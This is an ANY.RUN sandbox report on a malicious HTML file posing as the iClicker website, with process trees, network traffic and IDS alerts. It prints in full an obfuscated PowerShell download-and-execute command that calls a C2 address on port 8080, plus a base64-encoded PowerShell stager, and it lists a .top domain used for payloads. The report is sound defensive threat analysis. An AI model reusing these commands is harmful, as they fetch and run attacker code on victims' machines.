download:

/

Full analysis: https://app.any.run/tasks/bdcc6d7b-783f-4924-8ff1-1f079609a37e
Verdict: Malicious activity
Analysis date: April 14, 2025, 13:18:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-powershell
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines (21410)
MD5:

BEE5A5C2B1AC1DD8618B0A9B343CC3B3

SHA1:

789D689EC7AF00B1411A3EF96513108C0E4A47FE

SHA256:

CB19A88EF0021DA90CA92BA0731A54D1CAE25B8CB42B741DD950373B9A9ED148

SSDEEP:

6144:wcUu2SR0WtXkkmolNe4otzWr/hwEKVISMzyNijQPs5k:Au2IetzmwEKCzyNUQPs5k

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Connects to the CnC server

      • powershell.exe (PID: 2136)
  • SUSPICIOUS

    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 7612)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 2136)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7700)
    • Application launched itself

      • powershell.exe (PID: 2136)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 2136)
    • Uses SYSTEMINFO.EXE to read the environment

      • powershell.exe (PID: 2136)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 2136)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 7700)
    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 7612)
  • INFO

    • Create files in a temporary directory

      • csc.exe (PID: 7700)
      • cvtres.exe (PID: 7720)
    • Checks supported languages

      • csc.exe (PID: 7700)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 7700)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7612)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 2136)
    • Found Base64 encoded access to processes via PowerShell (YARA)

      • powershell.exe (PID: 2136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.htm/html | HyperText Markup Language with DOCTYPE (80.6)
.html | HyperText Markup Language (19.3)

EXIF

HTML

ContentType: text/html; charset=UTF-8
Viewport: width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0
Robots: index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1
Title: iClicker: Student Response & Classroom Engagement Tools
Description: Easy to use, reliable, & focused on pedagogy: meet iClicker, the market-leader in Higher Education student & audience response systems.
TwitterCard: summary_large_image
Generator: Powered by WPBakery Page Builder - drag and drop page builder for WordPress.
MsapplicationTileImage: https://www.iclicker.com/wp-content/uploads/2019/08/favicon.png
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
141
Monitored processes
10
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
780\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2136"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "$a=67; $b=217; $c=228; $d=14; $e=':8080/'; $u=[string]$a+'.'+$b+'.'+$c+'.'+$d+$e; $t=[math]::Floor(([datetime]::UtcNow-[datetime]'1970-01-01').TotalSeconds/16)*16; iex(irm($u+$t))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3240"C:\WINDOWS\system32\systeminfo.exe"C:\Windows\System32\systeminfo.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3900C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
6800"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7424C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -EmbeddingC:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
7612"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -enc JABTAGgAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACwAIABpAG4AdAAgAG4AQwBtAGQAUwBoAG8AdwApADsAJwA7ACQAUwBoAG8AIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBNAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABTAGgAIAAtAG4AYQBtAGUAIABXAGkAbgAzADIAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBQAGEAcwBzAFQAaAByAHUAOwAkAHcAdAAgAD0AIABOAGUAdwAtAEcAdQBpAGQAOwAkAEgAbwBzAHQALgBVAEkALgBSAGEAdwBVAEkALgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAAJAB3AHQAOwAkAFAAcgAgAD0AIAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBNAGEAaQBuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAgAC0AZQBxACAAJAB3AHQAIAB9ACkAOwAkAFMAaABvADoAOgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAoACQAUAByAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBIAGEAbgBkAGwAZQAsACAAMAApADsAIAAKACQAcgA9AFsAUwB5AHMAdABlAG0ALgBSAGEAbgBkAG8AbQBdADoAOgBuAGUAdwAoACgAWwBpAG4AdABdACgAZwBlAHQALQBkAGEAdABlACAALQBmACAAeQB5AHkAeQBNAE0AZABkACkAKwA4ADQANAAxACkAKQA7ACQAYQA9ACgAMQAuAC4AMQA1AHwAJQB7AFsAYwBoAGEAcgBdACgAJAByAC4ATgBlAHgAdAAoADkANwAsADEAMgAyACkAKQB9ACkALQBqAG8AaQBuACcAJwA7AGYAdQBuAGMAdABpAG8AbgAgAGQAewBwAGEAcgBhAG0AKAAkAHMALABbAGkAbgB0AF0AJABvACkAIAAtAGoAbwBpAG4AIAAoACQAcwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAfAAlAHsAWwBjAGgAYQByAF0AKABbAGkAbgB0AF0AJABfACsAJABvACkAfQApAH0AOwAkAGcAPQBkACAAIgAzAHkAdAB1ADQANgAzAHUAbQB1AEQAeABCADoANwA8ACIAIAAtADUAOwBpAGUAeAAoAGMAdQByAGwAIAAtAHUAcwBlAGIAIAAiACQAYQAkAGcAIgApACAAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
7700"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\cl5hx4yb.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
7720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF222.tmp" "c:\Users\admin\AppData\Local\Temp\CSC8C59AC07B6BD42C9AACDFF58B87B4BB4.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase_clr0400.dll
Total events
17 241
Read events
17 235
Write events
6
Delete events
0

Modification events

(PID) Process:(7424) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31173951
(PID) Process:(7424) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
(PID) Process:(2196) svchost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Dnscache\Parameters\DnsPolicyConfig\DNS_RESILIENCY_fe3cr.delivery.mp.microsoft.com
Operation:writeName:Name
Value:
fe3cr.delivery.mp.microsoft.com
(PID) Process:(2196) svchost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Dnscache\Parameters\DnsPolicyConfig\DNS_RESILIENCY_fe3cr.delivery.mp.microsoft.com
Operation:writeName:ConfigOptions
Value:
8
(PID) Process:(2196) svchost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Dnscache\Parameters\DnsPolicyConfig\DNS_RESILIENCY_fe3cr.delivery.mp.microsoft.com
Operation:writeName:Version
Value:
2
(PID) Process:(2196) svchost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Dnscache\Parameters\DnsPolicyConfig\DNS_RESILIENCY_fe3cr.delivery.mp.microsoft.com
Operation:writeName:GenericDNSServers
Value:
162.159.36.2
Executable files
1
Suspicious files
6
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K246ZIV482G54EM6C44Z.tempbinary
MD5:0CB279DBC4BBCA444BC65FC98D0BDE9C
SHA256:E04D00496495F70138F4BF82329091A0FB1A2B469CC7B76A6509C4353E66A85E
7612powershell.exeC:\Users\admin\AppData\Local\Temp\cl5hx4yb.0.cstext
MD5:A6E80541A483188DBCE2F3D843FCBE4D
SHA256:D5B10C7F3CBB62CBF4772A7B178C578C8ABAA3FE9A7420DECBFF18D81F08CCD9
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c083.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
2136powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3sdvonuh.skn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:0CB279DBC4BBCA444BC65FC98D0BDE9C
SHA256:E04D00496495F70138F4BF82329091A0FB1A2B469CC7B76A6509C4353E66A85E
2136powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wp0m3a1r.es1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7424TiWorker.exeC:\Windows\Logs\CBS\CBS.logtext
MD5:4CB8119EE094336A6C6A854A54B57E1C
SHA256:2FF09473499C8975B6C44DF003F9B0C34D52E01A5E34B62D4213E8367E07133F
7612powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a5tzk5i5.4kd.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7612powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4jgx5ky1.gfu.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7720cvtres.exeC:\Users\admin\AppData\Local\Temp\RESF222.tmpbinary
MD5:1E2615071CD5883F7E344B3997AC2CE3
SHA256:F5E6856C54FB093B92F23B899E4FDCBF12F48FB338BD20A3979EA6953926EC3B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
21
DNS requests
18
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
2136
powershell.exe
GET
200
67.217.228.14:8080
http://67.217.228.14:8080/1744636736
US
text
271 b
unknown
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
DE
binary
471 b
whitelisted
7612
powershell.exe
GET
302
185.250.151.155:80
http://kbcximoaqhffxnm.top/1.php?s=527
US
malicious
2136
powershell.exe
POST
200
67.217.228.14:8080
http://67.217.228.14:8080/1744636736
US
text
1.58 Kb
unknown
7960
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
DE
binary
419 b
whitelisted
7960
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
DE
binary
407 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.53.40.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
2136
powershell.exe
67.217.228.14:8080
SRS-6-Z-7381
US
unknown
6544
svchost.exe
20.190.160.65:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4628
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.174
whitelisted
crl.microsoft.com
  • 23.53.40.176
  • 23.53.40.178
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.160.65
  • 20.190.160.20
  • 40.126.32.76
  • 20.190.160.14
  • 40.126.32.136
  • 40.126.32.140
  • 20.190.160.130
  • 40.126.32.74
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
kbcximoaqhffxnm.top
  • 185.250.151.155
unknown
vjtx3ydy2ekte5f.com
unknown
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted

Threats

PID
Process
Class
Message
2136
powershell.exe
A Network Trojan was detected
ET MALWARE Generic Malware CnC Activity - (Unix Timestamp In HTTP URI)
2136
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2136
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2136
powershell.exe
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
7612
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
7612
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info